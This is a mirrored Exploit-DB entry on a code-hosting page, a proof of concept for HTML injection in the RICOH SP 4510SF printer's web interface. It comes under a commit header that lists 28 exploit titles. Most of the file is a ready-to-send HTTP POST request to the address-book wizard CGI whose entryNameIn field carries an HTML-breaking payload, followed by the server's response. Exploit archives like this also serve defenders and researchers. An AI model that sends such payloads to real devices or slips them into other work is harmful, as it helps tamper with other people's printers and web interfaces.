bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/47826.txt
Offensive Security cd36764b57 DB: 2019-12-31 
28 changes to exploits/shellcodes

OpenBSD - Dynamic Loader chpass Privilege Escalation (Metasploit)
Reptile Rootkit - reptile_cmd Privilege Escalation (Metasploit)
Microsoft UPnP - Local Privilege Elevation (Metasploit)
AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)
FTP Navigator 8.03 - Stack Overflow (SEH)
Wing FTP Server 6.0.7 - Unquoted Service Path
Domain Quester Pro 6.02 - Stack Overflow (SEH)
FreeBSD-SA-19:02.fd - Privilege Escalation
FreeBSD-SA-19:15.mqueuefs - Privilege Escalation
HomeAutomation 3.3.2 - Persistent Cross-Site Scripting
HomeAutomation 3.3.2 - Authentication Bypass
HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin)
HomeAutomation 3.3.2 - Remote Code Execution
elearning-script 1.0 - Authentication Bypass
XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin)
Thrive Smart Home 1.1 - Authentication Bypass
XEROX WorkCentre 7855 Printer - Cross-Site Request Forgery (Add Admin)
XEROX WorkCentre 7830 Printer - Cross-Site Request Forgery (Add Admin)
WEMS BEMS 21.3.1 - Undocumented Backdoor Account
AVE DOMINAplus 1.10.x - Credential Disclosure
AVE DOMINAplus 1.10.x - Unauthenticated Remote Reboot
AVE DOMINAplus 1.10.x - Cross-Site Request Forgery (enable/disable alarm)
AVE DOMINAplus 1.10.x - Authentication Bypass
Heatmiser Netmonitor 3.03 - Hardcoded Credentials
MyDomoAtHome REST API Domoticz ISS Gateway 0.2.40 - Information Disclosure
RICOH SP 4510SF Printer - HTML Injection
RICOH Web Image Monitor 1.09 - HTML Injection
Heatmiser Netmonitor 3.03 - HTML Injection
2019-12-31 05:02:03 +00:00

47 lines
No EOL
1.6 KiB
Text
Raw Blame History

# Exploit Title: RICOH SP 4510SF Printer - HTML Injection
# Date: 2019-05-06
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/re1/model/sp4510/sp4510.htm
# Software: RICOH Printer
# Product Version: SP 4510SF
# Vulernability Type: Code Injection
# Vulenrability: HTML Injection
# CVE: N/A
# Description :
# An HTML Injection vulnerability has been discovered on the RICOH SP 4510SF
# via the /web/entry/en/address/adrsSetUserWizard.cgi entryNameIn parameter.
# HTTP POST Request :
POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 218
Origin: http://XXX.XXX.XX.XXX
Connection: close
Referer: http://189.72.192.16/web/entry/en/address/adrsList.cgi
Cookie: risessionid=058916016024825; cookieOnOffChecker=on; wimsesid=314062051
mode=ADDUSER&step=BASE&wimToken=1273767750&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3Eismailtasdelen&entryDisplayNameIn=%22%3E%3Ch1%3Eismailtasdelen&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
# HTTP Response :
HTTP/1.1 200 OK
Date: Fri, 20 Dec 2019 07:59:19 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Expires: Fri, 20 Dec 2019 07:59:19 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close
[14]
Reference in a new issue View git blame Copy permalink